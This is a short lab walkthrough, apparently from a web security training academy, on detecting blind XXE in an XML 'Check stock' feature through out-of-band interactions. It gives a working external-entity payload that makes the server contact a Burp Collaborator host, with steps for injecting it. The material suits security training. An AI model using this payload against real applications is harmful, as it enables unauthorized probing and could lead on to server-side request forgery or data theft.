Blind XXE with out-of-band interaction

Description

This lab has a “Check stock” feature that parses XML input but does not display the result.

You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

Reproduction and proof of concept

  1. Visit a product page, click “Check stock” and intercept the resulting POST request in Burp Suite Professional.

  2. Go to the Burp menu, and launch the Burp Collaborator client.

  3. Click “Copy to clipboard” to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.

  4. Insert the following external entity definition in between the XML declaration and the stockCheck element, but insert your Burp Collaborator subdomain where indicated:

<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> ]>

  1. Replace the productId number with a reference to the external entity &xxe;

XXE

  1. Go back to the Burp Collaborator client window, and click “Poll now”. You should see some DNS and HTTP interactions that were initiated by the application as the result of the payload.

XXE

If you don’t see any interactions listed, wait a few seconds and try again.

Exploitability

An attacker needs to use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator. Note: To prevent the Academy platform being used to attack third parties, the firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator’s default public server.